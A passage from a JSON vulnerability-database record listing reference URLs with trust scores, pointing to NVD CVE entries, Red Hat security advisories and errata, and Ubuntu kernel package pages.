        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-16233"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-19537"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-19770"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-9455"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/errata/rhsa-2020:4609"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-18809"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-15925"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-20054"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-19068"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/documentation/en-us/red_hat_enterprise_linux/8/html/8.3_release_notes/index"
      },
      {
        "trust": 0.1,
        "url": "https://www.redhat.com/mailman/listinfo/rhsa-announce"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-19319"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-19063"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-19767"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-19062"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-20636"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-1073"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-0305"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-19056"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-15917"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-19072"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-19533"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-18808"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-19524"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-19332"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-25039"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2020-8286"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2020-28196"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2020-15358"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-15358"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2021-21639"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2021-28165"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2017-14502"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2021-28092"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2020-13434"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-25037"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-13776"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2019-25037"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2019-3842"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2020-13776"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2020-24977"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2020-8231"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2021-27219"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2020-10878"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2020-29362"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-24330"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2020-28935"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2021-28163"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-13434"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2017-14502"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2019-25034"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2020-8285"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2019-25035"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2016-10228"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2019-9169"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2019-14866"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2020-26116"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/documentation/en-us/red_hat_advanced_cluster_mana"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2019-25038"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-14866"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2020-26137"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-25013"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2021-21309"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-25040"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2021-21640"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2020-29361"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2021-28918"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2020-24330"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2021-3543"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-25042"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2021-3501"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2019-25042"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2020-25648"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-25038"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2019-25032"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2019-25041"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2019-25036"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-25032"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2020-27619"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2021-25215"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2021-3177"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-9169"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2020-24331"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2020-25692"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2021-3326"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-25036"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2019-25013"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-25035"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2019-2708"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2021-23336"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-2433"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2020-8927"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-10543"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2020-29363"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2020-24332"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2021-3114"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-3842"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2020-10543"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2019-25039"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2019-25040"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-2708"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2016-10228"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-10878"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-25041"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/errata/rhsa-2021:2461"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2020-8284"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-25034"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2020-27618"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/errata/rhsa-2021:2314"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/errata/rhsa-2021:2316"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-kvm/5.3.0-1016.17"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-gke-5.3/5.3.0-1018.19~18.04.1"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-hwe/5.3.0-51.44~18.04.2"
      },
      {
        "trust": 0.1,
        "url": "https://usn.ubuntu.com/4342-1"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-raspi2/5.3.0-1023.25"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-gcp/5.3.0-1018.19"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-azure/5.3.0-1020.21"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-raspi2-5.3/5.3.0-1023.25~18.04.1"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux/5.3.0-51.44"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-aws/5.3.0-1017.18"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2020-25662"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2019-20907"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2020-8624"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2018-16300"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2018-14466"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2018-10105"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2020-25684"
      },
      {
        "trust": 0.1,
        "url": "https://docs.openshift.com/container-platform/4.7/updating/updating-cluster"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2019-13050"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2020-24490"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2021-2007"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2020-9925"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2019-15166"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2020-9802"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2019-20218"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2020-26160"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2018-16230"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2020-9895"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2019-8625"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2019-13225"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2020-13249"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2020-27846"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2019-15165"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2019-20388"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2020-14382"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2019-8812"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2020-3899"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2019-8819"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2018-10103"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2018-14467"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2018-14469"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-11068"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2020-3867"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2020-1971"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2018-16229"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2019-8720"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2020-9893"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2019-19221"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2019-8808"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2018-14553"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2020-3902"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2018-14465"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2018-14882"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2020-8623"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2018-16227"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2019-18197"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2020-1751"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2020-3900"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2020-8566"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2020-15862"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2020-25683"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2020-25211"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2018-14461"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2019-19602"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2018-14881"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2020-9805"
      },
      {
        "trust": 0.1,
        "url": "https://docs.openshift.com/container-platform/4.7/release_notes/ocp-4-7-rel"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2018-14464"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2019-8820"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2020-9807"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2019-8769"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2019-8710"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2019-8813"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2020-10773"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2020-25661"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2020-9850"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2018-14463"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2020-7595"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2020-10749"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2019-6977"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2019-8811"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2018-16228"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2018-14879"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2020-29652"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2019-16168"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2020-9803"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2020-8177"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2020-9862"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2020-24659"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2020-16166"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2018-14469"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2020-7774"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2020-9327"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2018-10105"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2018-14880"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2020-3885"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2019-17450"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2020-15503"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2019-16935"
      },
      {
        "trust": 0.1,
        "url": "https://\u0027"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2018-14461"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2019-20916"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2019-5018"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2019-19956"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2020-1716"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2020-10018"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2019-20812"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/errata/rhsa-2020:5633"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2018-14468"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2020-14422"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2020-15157"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2019-8835"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2019-6978"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2020-25658"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2020-0444"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2019-8764"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2018-14466"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2019-8844"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2020-3865"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2018-14882"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2020-1730"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2018-16452"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2020-3864"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2018-16227"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2020-25694"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2018-14464"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2019-19906"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2018-14553"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2020-2752"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2018-16230"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2019-20386"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2019-20387"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2020-14391"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2020-15999"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2018-14468"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2018-14467"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2018-14462"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2020-3862"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2018-14880"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2020-25682"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2018-14881"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2020-2574"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2020-3901"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2019-17546"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2018-16300"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2019-3884"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2020-10763"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2019-8823"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2018-14462"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2020-1752"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2018-16229"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2020-8622"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2019-15903"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2020-3895"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2020-8492"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2020-11793"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2019-20454"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2018-20843"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2020-12465"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2020-25696"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2020-9894"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2020-25685"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2019-8816"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2020-9843"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2019-13627"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2020-6405"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2019-8771"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2018-16451"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2020-3897"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2018-10103"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2018-16228"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2020-9806"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2018-14463"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2019-8814"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2019-14889"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2019-8743"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2021-3121"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2020-9915"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2018-20843"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2020-25686"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2019-8815"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2020-2922"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2020-13632"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2020-25687"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2019-16167"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2020-10029"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2018-16451"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2019-8783"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2019-20807"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2020-13630"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2019-12614"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2020-14040"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2018-14879"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2020-14019"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2018-14470"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2020-25681"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2018-14470"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2020-8619"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2020-27813"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2018-14465"
